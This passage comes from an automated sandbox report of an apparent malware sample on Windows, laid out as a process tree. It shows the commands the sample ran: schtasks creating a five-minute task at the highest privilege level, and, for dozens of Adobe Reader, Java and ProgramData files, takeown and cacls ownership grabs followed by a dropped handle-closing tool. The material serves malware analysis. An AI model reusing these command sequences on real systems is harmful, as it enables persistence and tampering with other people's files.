      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\RRXtp1dC.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1984
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\RRXtp1dC.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:964
    - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz64.exe
        
        HE0Qzozz.exe -accepteula "DefaultID.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:1432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1948
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1224
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    - Modifies file permissions
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1244
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:620
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1724
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  - Loads dropped DLL
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    - Modifies file permissions
    PID:928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  - Loads dropped DLL
  PID:1716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "bl.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "bl.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1688
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  - Loads dropped DLL
  PID:1012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1576
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  - Loads dropped DLL
  PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    - Modifies file permissions
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1224
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  - Loads dropped DLL
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    - Modifies file permissions
    PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tl.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tl.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  - Loads dropped DLL
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "Identity-V" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  - Loads dropped DLL
  PID:1876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  - Loads dropped DLL
  PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:620
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  - Loads dropped DLL
  PID:1244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "brt55.ths" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "brt55.ths" -nobanner
      4⤵
      Executes dropped EXE
      PID:1284
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  - Loads dropped DLL
  PID:1728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    - Modifies file permissions
    PID:796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:528
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  - Loads dropped DLL
  PID:612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:620
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  - Loads dropped DLL
  PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    - Modifies file permissions
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1284
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1424
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  - Loads dropped DLL
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1728
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      Executes dropped EXE
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  - Loads dropped DLL
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:656
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1424
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
